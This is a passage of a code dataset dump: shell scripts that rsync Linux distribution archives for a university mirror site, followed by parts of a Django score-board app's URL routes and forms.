CMROOT)\n result = subprocess.check_output(cmd, shell=True)\n files = result.strip().split('\\n')\n generate_most_recent(files, 60)\n generate_directory_index(files)\n" }, { "alpha_fraction": 0.7658730149269104, "alphanum_fraction": 0.7658730149269104, "avg_line_length": 30.5, "blob_id": "9fd743dc0b4a3f953cea4db79d10a99b3f380892", "content_id": "d78221acc27d2eeebe570c7bd975311c5462118a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 252, "license_type": "no_license", "max_line_length": 70, "num_lines": 8, "path": "/pypi-update-stats", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This command should be run as root because nginx logs are not\n# readable by mirror. This should be fixed.\n/usr/local/bin/bandersnatch update-stats\n\n# Fix permissions\nchown mirror:mirror -R \"/home/mirror/mirrordata/pypi/web/local-stats/\"\n" }, { "alpha_fraction": 0.695364236831665, "alphanum_fraction": 0.7549669146537781, "avg_line_length": 15.777777671813965, "blob_id": "f138933c74ae8bab6f4abf71bc153ec3ee86c4c7", "content_id": "afe4cfd59772a2c736abd4576fb2315aaa7d6299", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 151, "license_type": "no_license", "max_line_length": 39, "num_lines": 9, "path": "/syncbin/CTAN", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=CTAN\n_UPSTREAM=rsync://rsync.tex.ac.uk/CTAN/\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n" }, { "alpha_fraction": 0.6148694157600403, "alphanum_fraction": 0.6376423239707947, "avg_line_length": 39.32432556152344, "blob_id": "3137a503f3a86bdbe895635193a63e113ec7169d", "content_id": "9ad654ab9f2e35b365db5d7e6ec54c50896f101a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 199, "num_lines": 37, "path": "/syncbin/debian", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=debian\n__UPSTREAM=ftp2.de.debian.org # for use with trace\n_UPSTREAM=rsync://$__UPSTREAM/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/project/trace/ftp.halifax.rwth-aachen.de\"\n\n_sync () {\n mkdir -p $MIRRORROOT/$_REPO\n cd $MIRRORROOT/$_REPO\n if _check_updated; then\n echo \"Remote timestamp is the same as local timestamp.\"\n echo \"No actual sync will be performed.\"\n return 0\n fi\n rsync $_UPSTREAM . -aHvh --exclude Packages* --exclude Sources* --exclude Release* --exclude InRelease --exclude i18n/* --exclude ls-lR* --links --safe-links --stats --hard-links --delay-updates\n RETVAL=$?\n if [ \"$RETVAL\" -eq \"0\" ]; then\n rsync $_UPSTREAM . -aHvh --delete --delete-delay --links --safe-links --stats --times --hard-links --delay-updates\n RETVAL=$?\n if [ \"$RETVAL\" -eq \"0\" ]; then\n if [ -d project/trace ] ; then\n date -u > project/trace/mirrors.hustunique.com\n echo 'Running on host: mirrors.hustunique.com' >> project/trace/mirrors.hustunique.com\n echo 'Architectures: GUESSED:{ source amd64 armel armhf hurd-i386 i386 ia64 kfreebsd-amd64 kfreebsd-i386 mips mipsel powerpc s390 s390x sparc}' >> project/trace/mirrors.hustunique.com\n echo \"Upstream-mirror: $__UPSTREAM\" >> project/trace/mirrors.hustunique.com\n fi\n fi\n fi\n cd $OWD\n return $RETVAL\n}\n\n" }, { "alpha_fraction": 0.7195122241973877, "alphanum_fraction": 0.7743902206420898, "avg_line_length": 17.11111068725586, "blob_id": "3d1335311c0c3326945bf86264abd98decff8726", "content_id": "55b4812d9a0f74f50192881eaea6c6fd6444cea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 164, "license_type": "no_license", "max_line_length": 47, "num_lines": 9, "path": "/syncbin/raspbian", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=raspbian\n_UPSTREAM=rsync://archive.raspbian.org/archive/\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7289156913757324, "alphanum_fraction": 0.7771084308624268, "avg_line_length": 17.44444465637207, "blob_id": "3ad3087015e9c26a9a7cfbe0d34714501a3ea176", "content_id": "6054f1c6bdedd2417e93939c34f4faf2a3458dfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 166, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/syncbin/deepin-cd", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=deepin-cd\n_UPSTREAM=rsync://cdimage.linuxdeepin.com/cdimage/\n_SYNCEVERY=7200\n_FAILRETRY=600\n_FAILRETRIES=3\n" }, { "alpha_fraction": 0.7438596487045288, "alphanum_fraction": 0.7719298005104065, "avg_line_length": 24.909090042114258, "blob_id": "f246c45dba0e3610a819030985ddf2ae5390e086", "content_id": "3b3afe341aaf5fbf2a9b0881dd702a352ecf7bc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 285, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/syncbin/kali-security", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=kali-security\n_UPSTREAM=rsync://kali.mirror.garr.it/$_REPO/\n_SYNCEVERY=120\n_FAILRETRY=120\n_FAILRETRIES=4\n_UPSTREAM_HTTP=http://kali.mirror.garr.it/mirrors/kali-security\n_TIMESTAMP_PATHS=\"/project/trace/mirror3.mirror.garr.it\"\n" }, { "alpha_fraction": 0.6894409656524658, "alphanum_fraction": 0.7453415989875793, "avg_line_length": 16.77777862548828, "blob_id": "cc46b555cadcd2231c5e329cb5a8e139ace23eb2", "content_id": "7d466cb11149e34c91defe3e25faa80932e9b31d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 161, "license_type": "no_license", "max_line_length": 44, "num_lines": 9, "path": "/syncbin/debian-cd", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=debian-cd\n_UPSTREAM=rsync://ftp2.jp.debian.org/$_REPO/\n_SYNCEVERY=3600\n_FAILRETRY=600\n_FAILRETRIES=3\n\n" }, { "alpha_fraction": 0.7376237511634827, "alphanum_fraction": 0.7722772359848022, "avg_line_length": 19.200000762939453, "blob_id": "31bec86e59e4b0819eaea09597464f05e3de10bc", "content_id": "93ff84cbb95be7918ccf80f719ff80b8c20a3e7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 202, "license_type": "no_license", "max_line_length": 49, "num_lines": 10, "path": "/syncbin/sagemath", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=sagemath\n_UPSTREAM=rsync://boxen.math.washington.edu/sage/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/zzz/timestamp.html\"\n" }, { "alpha_fraction": 0.721030056476593, "alphanum_fraction": 0.7639485001564026, "avg_line_length": 22.299999237060547, "blob_id": "7454ea525b7d10d1c4feee355948ea2eddb58fb5", "content_id": "f36c1d3313714cc09d046815d50d41e87149ac2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 233, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/syncbin/archlinuxarm", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=archlinuxarm\n_UPSTREAM=rsync://ftp2.de.debian.org/archlinux-arm/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/os/sync,/armv7h/sync,/armv6h/sync,/arm/sync\"\n" }, { "alpha_fraction": 0.565891444683075, "alphanum_fraction": 0.5865632891654968, "avg_line_length": 20.5, "blob_id": "482a0cd42b950fd6bcdb97a9247f6ff040897253", "content_id": "bf8e4dd1c551c97319dc29fb57a595d899866be7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 774, "license_type": "no_license", "max_line_length": 85, "num_lines": 36, "path": "/syncbin/linux-git", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=linux-git\n__REPO=linux.git\n_UPSTREAM=https://kernel.googlesource.com/pub/scm/linux/kernel/git/torvalds/linux.git\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n\n_sync () {\n mkdir -p $MIRRORROOT/$__REPO\n cd $MIRRORROOT/$__REPO\n git remote -v update\n RETVAL=$?\n cd $OWD\n return $RETVAL\n}\n\n_get_size() {\n OLD=$(kvdb_local_get last_du_time)\n if [ \"0$OLD\" -eq \"0\" ]; then\n OLD=0\n fi\n NOW=`date +%s`\n let P=NOW-OLD\n if [ \"$P\" -lt \"86400\" ]; then\n kvdb_local_get last_du_value\n else\n NSIZE=`du \"$MIRRORROOT/$__REPO/\" -sh | awk '{ print $1; }'`\n kvdb_local_set last_du_value \"$NSIZE\"\n kvdb_local_set last_du_time \"$NOW\"\n echo \"$NSIZE\"\n fi\n}\n" }, { "alpha_fraction": 0.7151898741722107, "alphanum_fraction": 0.7658227682113647, "avg_line_length": 16.44444465637207, "blob_id": "d70358c6b7557856f6ba177fee0e1d4a4eef0abd", "content_id": "90aebb373273cad172bb586cc212bcb462703890", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 158, "license_type": "no_license", "max_line_length": 44, "num_lines": 9, "path": "/syncbin/cygwin", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=cygwin\n_UPSTREAM=rsync://sourceware.org/cygwin-ftp/\n_SYNCEVERY=7200\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7055084705352783, "alphanum_fraction": 0.7224576473236084, "avg_line_length": 25.22222137451172, "blob_id": "cf45f5e6010223faec70d2a475b53c5e49628e7e", "content_id": "cfade390ae20e31f1f680b74bf84168b47e2ef08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 472, "license_type": "no_license", "max_line_length": 168, "num_lines": 18, "path": "/syncbin/cm", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=cm\n_UPSTREAM=rsync://download.cyanogenmod.org/mirror/\n_SYNCEVERY=9600\n_FAILRETRY=900\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --exclude index.html --exclude all.html\"\n\n_post_sync() {\n $SCRIPTROOT/cm_dir_index\n}\n\n_upstream_inconsistent() {\n curl -s \"http://jenkins.cyanogenmod.org/job/android/lastBuild/api/json?tree=building\" | python -c 'import sys,json; exit(int(not json.load(sys.stdin)[\"building\"]))'\n}\n" }, { "alpha_fraction": 0.741134762763977, "alphanum_fraction": 0.7730496525764465, "avg_line_length": 27.200000762939453, "blob_id": "1322b74f4275e8a6cc7b0346bc949bad73e75596", "content_id": "34b18e9b24983fee6634bcc7076b865f354aa5d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 282, "license_type": "no_license", "max_line_length": 92, "num_lines": 10, "path": "/syncbin/opensuse", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=opensuse\n_UPSTREAM=rsync://rsync.opensuse.org/opensuse-full-with-factory/opensuse/\n_SYNCEVERY=14400\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --exclude .timestamp_invisible --exclude ports/ --delete-excluded\"\n" }, { "alpha_fraction": 0.7245509028434753, "alphanum_fraction": 0.7784430980682373, "avg_line_length": 17.44444465637207, "blob_id": "4bb4aa71adec4de1b0eec85a5e04098839e2e76f", "content_id": "369d8ea88b3575f7ce6710bb2e57ffeb9c5ed0f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 167, "license_type": "no_license", "max_line_length": 52, "num_lines": 9, "path": "/syncbin/deepin", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=deepin\n_UPSTREAM=rsync://packages.linuxdeepin.com/packages/\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.6868420839309692, "alphanum_fraction": 0.7078947424888611, "avg_line_length": 21.352941513061523, "blob_id": "17b65e7903d14da0a23d1ed1785f55a64363ee46", "content_id": "0306a2b16120a93b1b9707a3a484b228eccc3333", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 380, "license_type": "no_license", "max_line_length": 62, "num_lines": 17, "path": "/syncbin/fedora", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=fedora\n_UPSTREAM=rsync://dl.fedoraproject.org/fedora-enchilada/linux/\n_SYNCEVERY=1800\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/../fullfilelist=/fullfilelist\"\n\n_post_sync () {\n cd $MIRRORROOT/$_REPO\n rsync \"${_UPSTREAM}../fullfilelist\" .\n $SCRIPTROOT/report_mirror -c \"$SCRIPTROOT/fedora.conf\"\n cd -\n}\n" }, { "alpha_fraction": 0.7307692170143127, "alphanum_fraction": 0.7644230723381042, "avg_line_length": 19.799999237060547, "blob_id": "fb198aef60ff71228aee798dbacb1133c36d2952", "content_id": "fee921b39808dc6f1b0f2e497782bec7c4ffbad9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "no_license", "max_line_length": 45, "num_lines": 10, "path": "/syncbin/gentoo-portage", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=gentoo-portage\n_UPSTREAM=rsync://rsync.us.gentoo.org/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/metadata/timestamp.chk\"\n" }, { "alpha_fraction": 0.7226027250289917, "alphanum_fraction": 0.7534246444702148, "avg_line_length": 28.200000762939453, "blob_id": "378239c6d00b50b367a738e14dd04ada4a1cf2b3", "content_id": "f6ba0fd7df78f00f8835477edc4b09115419dce0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 292, "license_type": "no_license", "max_line_length": 134, "num_lines": 10, "path": "/syncbin/qt", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=qt\n_UPSTREAM=rsync://master.qt-project.org/qt-all/\n_SYNCEVERY=43200\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --delete-excluded --exclude=archive/ --exclude=snapshots/ --exclude=community-releases/ --exclude=ministro/\"\n" }, { "alpha_fraction": 0.7422680258750916, "alphanum_fraction": 0.7783505320549011, "avg_line_length": 18.399999618530273, "blob_id": "7d8f87e3db423a016dde411180ec1a45d1d9737f", "content_id": "9bae7dcf96f0e8a4ce31822028d96200b1919997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 194, "license_type": "no_license", "max_line_length": 48, "num_lines": 10, "path": "/syncbin/archlinux", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=archlinux\n_UPSTREAM=rsync://mirror.leaseweb.net/archlinux/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/lastupdate\"\n" }, { "alpha_fraction": 0.5660579800605774, "alphanum_fraction": 0.5993555188179016, "avg_line_length": 23.5, "blob_id": "10e8ec83d5851fdf2deb49ea2265e4bf05053c65", "content_id": "b4a266ee6f22f11ae77ac62794ae2593d8e1995f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 931, "license_type": "no_license", "max_line_length": 163, "num_lines": 38, "path": "/syncbin/remi", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=remi\n_SUBREPO1=enterprise\n_SUBREPO2=fedora\n_UPSTREAM=rsync://remi.famillecollet.com\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS -4\"\n\n_sync () {\n mkdir -p $MIRRORROOT/$_REPO\n cd $MIRRORROOT/$_REPO\n if [[ $? != 0 ]]; then\n return 1\n fi\n mkdir -p $_SUBREPO1 $_SUBREPO2\n wget http://rpms.famillecollet.com/index.html -O index.html\n rsync $_UPSTREAM/$_SUBREPO1/ $_SUBREPO1/ $_RSYNC_ARGS\n RETVAL1=$?\n rsync $_UPSTREAM/$_SUBREPO2/ $_SUBREPO2/ $_RSYNC_ARGS\n RETVAL2=$?\n if [[ $RETVAL1 != 0 ]]; then\n RETVAL=$RETVAL1;\n fi\n if [[ $RETVAL2 != 0 ]]; then\n RETVAL=$RETVAL2;\n fi\n cd $OWD\n return $RETVAL\n}\n\n_get_size () {\n cat $LOGROOT/$_REPO/log.stdout | sed -n \"s/total size is \\(.*\\)[TKMG].*/\\1/ p\" | python -c 'a=raw_input();b=raw_input(); print \"%0.2lfG\" % (float(a)+float(b))'\n}\n" }, { "alpha_fraction": 0.6970954537391663, "alphanum_fraction": 0.7344398498535156, "avg_line_length": 17.538461685180664, "blob_id": "446a68052b066cd4a53de5901975b2db04faa6e2", "content_id": "48edf01625a6248ebef0a270f8e6aaa3a639d214", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 241, "license_type": "no_license", "max_line_length": 58, "num_lines": 13, "path": "/syncbin/epel", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=epel\n_UPSTREAM=rsync://dl.fedoraproject.org/fedora-epel/\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n\n_post_sync () {\n $SCRIPTROOT/report_mirror -c \"$SCRIPTROOT/fedora.conf\"\n}\n" }, { "alpha_fraction": 0.7176470756530762, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 17.77777862548828, "blob_id": "0852b6ccd75b58b6b6c0b315d2b3766f5d407f2f", "content_id": "6df4f88d942e135c2d49ca2b06b2d78c820e3b2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 170, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/syncbin/linuxmint-cd", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=linuxmint-cd\n_UPSTREAM=rsync://ftp.heanet.ie/pub/linuxmint.com/\n_SYNCEVERY=7200\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7168674468994141, "alphanum_fraction": 0.7771084308624268, "avg_line_length": 17.44444465637207, "blob_id": "41894cc437ad18b07c8a27586b959c6dfe798a22", "content_id": "984655ffb94979e7923d3ce2ad03aa2dd40ab0a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 166, "license_type": "no_license", "max_line_length": 44, "num_lines": 9, "path": "/syncbin/backtrack-iso", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=backtrack-iso\n_UPSTREAM=rsync://mirrors.rit.edu/backtrack/\n_SYNCEVERY=432000\n_FAILRETRY=600\n_FAILRETRIES=4\n" }, { "alpha_fraction": 0.7095237970352173, "alphanum_fraction": 0.761904776096344, "avg_line_length": 20, "blob_id": "981db574788b87daf2ca12737b30ad2b8aff041d", "content_id": "6859763bbe2e1496afc923091a4772a93bf88f29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 210, "license_type": "no_license", "max_line_length": 46, "num_lines": 10, "path": "/syncbin/kali-images", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=kali-images\n_UPSTREAM=rsync://kali.mirror.garr.it/$_REPO/\n_SYNCEVERY=3600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/kali-latest/amd64/SHA1SUMS\"\n" }, { "alpha_fraction": 0.7288135886192322, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 18.55555534362793, "blob_id": "b8ee9408ae619cb3ba4cc2e8de3f9e948072ef12", "content_id": "25fe290c9feeeff6e8dbcbbac03ef07da937b812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 177, "license_type": "no_license", "max_line_length": 53, "num_lines": 9, "path": "/syncbin/ubuntu-releases", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=ubuntu-releases\n_UPSTREAM=rsync://rsync.releases.ubuntu.com/releases/\n_SYNCEVERY=43200\n_FAILRETRY=600\n_FAILRETIRES=4\n\n" }, { "alpha_fraction": 0.7237569093704224, "alphanum_fraction": 0.7624309659004211, "avg_line_length": 17.100000381469727, "blob_id": "d0f83b7c46425df4d037db329657cc58e10224b3", "content_id": "34b9788ccfa9ec8d240e292996e330783c16f7b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 181, "license_type": "no_license", "max_line_length": 43, "num_lines": 10, "path": "/syncbin/eclipse", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=eclipse\n_UPSTREAM=rsync://rsync.osuosl.org/eclipse/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/TIME\"\n" } ]
38
fumpen/marbar
https://github.com/fumpen/marbar
b5df075d4267c6442d01cca6f7ab7372ef29cbcc
64c26479564be1599575ccffaa741da66c866deb
f501e36ff498098904cffdb499990fc86ff1b4fe
refs/heads/master
2020-04-20T01:58:02.005773
2019-02-19T14:46:16
2019-02-19T14:46:16
168,559,539
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5589680671691895, "alphanum_fraction": 0.5884521007537842, "avg_line_length": 30.30769157409668, "blob_id": "2faab9734f1a79aaded94b823f9055ea11cc9185", "content_id": "2cda678b130a08e4cdc3cffc76ddd71ed9b3387e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 814, "license_type": "no_license", "max_line_length": 115, "num_lines": 26, "path": "/marbar/score_board/migrations/0001_initial.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.1 on 2018-10-26 15:02\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('management', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ScoreUnit',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(default='', max_length=200)),\n ('points', models.IntegerField(default=0)),\n ('placement', models.IntegerField(default=0)),\n ('marbar', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='management.MarBar')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.6750348806381226, "alphanum_fraction": 0.6750348806381226, "avg_line_length": 43.75, "blob_id": "9aab15911de2ea01af9d8250e8592e6adf292e13", "content_id": "f896e7890ae8eb7b5b358cd0a5c397c39c56a8ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 717, "license_type": "no_license", "max_line_length": 76, "num_lines": 16, "path": "/marbar/management/urls.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.general_management, name='management_view'),\n path('login/', views.crude_login_view, name='login_view'),\n path('login_post/', views.crude_login, name='login'),\n path('logout/', views.logout_user, name='logout'),\n path('create_marbar/', views.create_marbar, name='create_marbar'),\n path('create_user/', views.create_user, name='create_user'),\n path('update_marbar/', views.update_marbar, name='update_marbar'),\n path('activate_marbar/', views.activate_marbar, name='activate_marbar'),\n path('events/', views.events_view, name='events'),\n path('delete_event/', views.delete_event, name='delete_event'),\n]\n\n" }, { "alpha_fraction": 0.5163496732711792, "alphanum_fraction": 0.5336610674858093, "avg_line_length": 45.32673263549805, "blob_id": "76863951e36e901b5aa467bb30bdce55df1652b9", "content_id": "900bf37f5b07e3f24e5c46d0fee3dae41c3a6ab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4679, "license_type": "no_license", "max_line_length": 118, "num_lines": 101, "path": "/marbar/management/forms.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom management.models import MarBar, Event\nfrom score_board.models import ScoreUnit\nfrom django.db import transaction\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib import messages\n\n\nSTD_FORM = [('1A', 1), ('2A', 1), ('3A', 1), ('4A', 1), ('5A', 1), ('6A', 1), ('7A', 1),\n ('1B', 2), ('2B', 2), ('3B', 2), ('4B', 2), ('5B', 2), ('6B', 2), ('7B', 2),\n ('1C', 3), ('2C', 3), ('3C', 3), ('4C', 3), ('5C', 3), ('6C', 3), ('7C', 3),\n ('1D', 4), ('2D', 4), ('3D', 4), ('4D', 4), ('5D', 4), ('6D', 4), ('7D', 4),\n ('Aspirants', 0), ('Crew', 0), ('MarBar Committee', 0)]\n\n\nclass NewUser(forms.Form):\n title = forms.CharField(max_length=100)\n mail = forms.CharField(max_length=100)\n password1 = forms.CharField(max_length=100)\n password2 = forms.CharField(max_length=100)\n\n def clean_user(self):\n cleaned_data = super().clean()\n pass1 = cleaned_data.get('password1')\n pass2 = cleaned_data.get('password2')\n if pass1 == pass2:\n return cleaned_data\n else:\n forms.ValidationError('The provided passwords must be the same')\n\n\nclass MarBarForm(forms.Form):\n title = forms.CharField()\n #banner = forms.ImageField(required=False)\n users = forms.ModelMultipleChoiceField(queryset=None, to_field_name='username',\n widget=forms.CheckboxSelectMultiple, required=False)\n end_date = forms.DateTimeField(widget=forms.DateTimeInput, input_formats=['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M'])\n create_standard_fields = forms.BooleanField(required=False)\n\n intended_pk = forms.IntegerField(widget=forms.HiddenInput, required=False)\n\n class Meta:\n model = MarBar\n fields = ['title', 'end_date', 'is_active', 'create_standard_fields']\n\n def __init__(self, *args, **kwargs):\n user_choices = User.objects.all().exclude(is_superuser=True)\n super().__init__(*args, **kwargs)\n self.fields['users'].queryset = user_choices\n\n def save(self, new_instance=False, update_instance=False):\n if self.is_valid() & new_instance:\n with transaction.atomic():\n new_marbar = MarBar.objects.create(title=self.cleaned_data['title'],\n end_date=self.cleaned_data['end_date'], is_active=False)\n for u in self.cleaned_data['users']:\n new_marbar.users.add(u)\n new_marbar.save()\n\n if self.cleaned_data['create_standard_fields']:\n for n, p in STD_FORM:\n ScoreUnit.objects.create(title=n, points=0, placement=p, marbar=new_marbar)\n\n if self.is_valid() & update_instance:\n marbar_update = MarBar.objects.get(pk=self.cleaned_data['intended_pk'])\n with transaction.atomic():\n marbar_update.title = self.cleaned_data['title']\n marbar_update.end_date = self.cleaned_data['end_date']\n marbar_update.users.clear()\n for u in self.cleaned_data['users']:\n marbar_update.users.add(u)\n marbar_update.save()\n\n if self.cleaned_data['create_standard_fields']:\n for n, p in STD_FORM:\n ScoreUnit.objects.create(title=n, points=0, placement=p, marbar=marbar_update)\n\n\n\n\nclass EventForm(forms.Form):\n title = forms.CharField()\n info = forms.CharField(required=False)\n start_date = forms.DateTimeField(widget=forms.DateTimeInput, 